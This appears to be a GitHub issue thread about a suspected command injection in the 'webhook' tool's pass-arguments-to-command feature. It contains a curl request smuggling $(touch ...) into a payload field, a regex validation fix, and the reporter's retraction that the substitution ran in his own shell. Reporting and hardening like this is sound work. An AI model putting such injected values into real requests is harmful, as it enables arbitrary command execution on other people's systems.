Command injection vulnerability

[svandezande]

When using pass-arguments-to-command you can inject arbitrary commands into the payload and they will be executed.

Hook definition:

- id: my_hook
  execute-command: "/my_script.sh"
  http-methods:
    - POST
  pass-arguments-to-command:
    - source: payload
      name: prefix

curl -d "prefix=dummy$(touch ~/my_test_file)" -X POST http://localhost:9000/hooks/my_hook

Running this curl command causes ~/my_test_file to be created.

[hnutank163]

You mentioned potential shell injection in the prefix parameter. To mitigate this risk, you can use regex to validate the prefix parameter. The webhook documentation provides a way to use regex for parameter validation, which can help ensure that the prefix parameter conforms to expected patterns and reduces the risk of injection attacks.

Using Regex to Validate the prefix Parameter
You can use the match regex rule to validate the prefix parameter in your webhook configuration. For example, if you want the prefix parameter to only contain alphanumeric characters, you can use the following configuration:

{
  "match": {
    "type": "regex",
    "regex": "^[a-zA-Z0-9]+$",
    "parameter": {
      "source": "payload",
      "name": "prefix"
    }
  }
}

[svandezande]

On further testing, I realized this probably isn't as serious as I thought - the $() injection was happening on my command line when issuing the curl command. If I escape the $ so it is passed in the payload, it doesn't seem to get executed when the hook executes the script. Per your suggestion, I've added regex rules to exclude payloads with special characters.